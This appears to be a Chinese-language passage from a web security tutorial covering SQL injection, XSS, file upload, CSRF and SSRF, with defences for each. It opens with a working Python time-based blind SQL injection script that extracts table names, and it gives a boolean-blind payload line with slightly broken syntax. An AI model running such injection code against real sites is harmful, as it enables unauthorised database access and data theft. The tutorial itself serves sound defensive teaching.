常见 WEB 安全漏洞原理及防御措施详解

#coding=utf-8
import requests
import string
import time

table = string.digits + string.ascii_lowercase + string.ascii_uppercase + ' {}_-<>?'
result = ''
for i in range(1, 45):
    for j in table:
        start = time.time()
        url = "http://target.com/test.php"
        payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        data = {
            'id': f"1' and if(substr(({payload}),{i},1)='{j}',sleep(5),1)--+",
            'debug': '0'
        }
        r = requests.post(url, data=data, timeout=1)
        end = time.time()
        if end - start > 5:
            result += j
            print(result)
            break

(2) 基于布尔的盲注 同'基于时间的盲注'一样，该类型的注入也不会直接返回数据。攻击者利用布尔逻辑来判断 SQL 查询是否成功执行，并通过观察应用程序的响应（TRUE：正常返回，FALSE：没有返回）以推断数据库信息。

核心语句：

1' and if(substr(({payload}),{i},1)='{j}')--+

3. 其它类型注入

• 堆叠注入：允许攻击者在一次注入中执行多个 SQL 查询。
• 二次注入：攻击者首先将恶意输入提交给应用程序，存储在数据库中，然后在后续请求中利用存储的恶意输入来触发 SQL 注入。
• 宽字节注入：特定类型的字符编码注入，通常与多字节字符集一起使用，例如 UTF-8。

1.3 防御策略

1. 输入参数的过滤：对于用户输入数据，进行严格的验证和过滤，只允许合法和预期的字符通过。建议使用白名单机制。
2. 使用参数化查询：使用参数化查询语句（Prepared Statements）是防止 SQL 注入的首选方法。该方法可将用户的输入数据作为参数传递给 SQL 查询，而不是将其嵌入到 SQL 语句中。
   • PHP PDO 示例：

     $stmt = $pdo->prepare('SELECT * FROM users WHERE id = :id');
     $stmt->execute(['id' => $user_input]);
     

3. 最小权限原则：数据库用户应该被授予最小的权限，以执行需要的操作。

2. XSS 漏洞 (Cross-Site Scripting)

2.1 漏洞简介

XSS 漏洞的本质是源于应用程序未能充分过滤或转义用户提供的输入数据，使攻击者能够将恶意脚本注入到 Web 页面上，然后在受害者的浏览器中执行这些脚本。该漏洞发生在客户端，控制用户浏览器的一种攻击。

常见危害包括：窃取 Cookie、JS 恶意挖矿、广告刷流量、XSS 蠕虫等。

2.2 漏洞分类

根据攻击类型和漏洞执行的不同，XSS 漏洞主要分为以下三种类型：

1. 反射型 XSS (Reflected XSS)

   • 注入的恶意代码通过浏览器传入到服务器后，又被目标服务器反射回来，在浏览器中解析并执行。
   • 黑客需要诱使用户点击恶意链接，才能攻击成功。

2. 存储型 XSS (Stored XSS)

   • 攻击者将恶意代码传入到服务器后，将被永久存放在目标服务器的数据库或存储中。
   • 用户访问存在漏洞的页面就会触发恶意代码执行，一般无需诱使用户点击恶意链接。

3. DOM 型 XSS (DOM-based XSS)

   • 发生在浏览器的客户端，而不是在服务器上。
   • 攻击者通过修改页面上的 DOM 结构，来触发漏洞。攻击代码不会与后台交互、流量不经服务端。

2.3 防御策略

1. 输入过滤：过滤用户输入，删除或禁用可能包含恶意代码的标签、脚本和特殊字符。
2. 输出编码：在输出数据到 HTML 页面时，应该对其进行适当的编码，目的是防止浏览器将用户输入解释为可执行的脚本。
3. 内容安全策略 (CSP)：CSP 允许定义哪些来源的内容可以被加载和执行，从而限制恶意脚本的执行。
   • 示例 Header：

     Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com
     

4. HttpOnly 和 Secure 标志：对于 Cookie，使用 HttpOnly 标志可以防止 JavaScript 访问它们。同时，在敏感数据传输时可使用 Secure 标志。

3. 文件上传漏洞

3.1 漏洞简介

文件上传漏洞的本质是应用程序未能验证和限制上传文件的类型、大小和位置，导致攻击者可以上传包含恶意代码的文件，从而对服务器和应用程序构成威胁。

主要危害：

• 恶意文件执行：上传 WebShell。
• 拒绝服务攻击：上传大型文件消耗资源。
• 敏感数据泄漏：上传到敏感目录访问备份文件。

3.2 防御策略

1. 文件类型白名单：限制允许上传的文件类型，仅接受符合要求的文件类型，并以白名单形式对扩展名进行校验。
2. 文件大小限制：限制上传文件的大小，防止消耗服务器资源。
3. 文件名随机化：保存上传文件时，将文件名随机生成，而不是使用原始文件名。
4. 隔离上传文件：上传的文件应该保存在与应用程序代码和数据分离的目录中，并限制目录下文件的执行权限。

4. CSRF 漏洞 (Cross-Site Request Forgery)

4.1 漏洞简介

CSRF 漏洞是利用用户已经通过身份验证的会话来执行未经授权的操作。攻击者通过伪装成合法用户的请求，可诱使受害者在不知情的情况下执行了意外的操作。

与 XSS 攻击的对比：

• 相同点：二者都在客户端执行恶意代码。
• 不同点：XSS 攻击主要以窃取用户身份凭证为目的，而 CSRF 只是借用了用户身份凭证发起恶意请求。

4.2 防御策略

1. CSRF 令牌 (Token)：在表单提交或敏感操作的请求中包含一个随机生成的 CSRF 令牌，服务器验证令牌的有效性。
2. Referer 检查：检查 HTTP 头中的 Referer 字段，确保请求来自合法的来源。
3. 同源策略：强制同源策略，有效阻止跨站请求伪造攻击。
4. 图形验证码：在敏感操作处，添加图形验证码。
5. SameSite Cookie 属性：设置 Cookie 的 SameSite 属性为 Strict 或 Lax，防止跨站携带 Cookie。

5. SSRF 漏洞 (Server-Side Request Forgery)

5.1 漏洞简介

SSRF 漏洞允许攻击者通过伪造请求，使目标服务器发起与应用程序本身有关的请求，从而可能导致各种安全问题。

通常情况下，SSRF 攻击的目标是从外网无法访问的内部系统，可能导致敏感数据泄露、内网端口扫描探测、攻击内网 WEB 服务等问题。

常用伪协议：dict 协议、file 协议、gopher 协议等。

5.2 防御策略

1. 输入验证和白名单控制：对于用户提供的 URL 或参数，进行严格的输入验证和过滤，只允许合法和可信任的 URL 进入应用程序。
2. 禁用危险的协议和端口：限制应用程序对危险协议和资源的访问，如：禁用 file、dict、gopher 等伪协议，仅允许 HTTP 或 HTTPS 协议。
3. 限制重定向和 URL 跳转：避免在应用程序中允许用户控制的跳转和重定向，或者限制它们的用途。
4. 网络和主机层环境隔离：将应用程序部署在受控的网络环境中，限制其对内部网络的访问权限。

三、总结归纳

整体而言，一切输入都是有害的，输出也不安全！Web 安全问题的核心是输入输出的问题，非法的输入未经严格编码、过滤、验证，以及随意的输出，都会引入各种安全问题。

本文从安全攻防的角度针对常见 WEB 漏洞的原理和防护措施进行了总结，涵盖 SQL 注入、XSS 漏洞、文件上传、CSRF 漏洞、SSRF 漏洞等。在实际开发中，应遵循安全开发生命周期（SDL），在需求、设计、编码、测试各阶段融入安全考量，构建纵深防御体系。

此外，建议定期使用自动化扫描工具结合人工审计的方式进行漏洞排查，并及时关注 OWASP Top 10 等权威安全报告，保持对新型攻击手法的认知。建立完善的应急响应机制，确保在发现漏洞后能快速定位、修复和复盘，持续优化系统的安全性。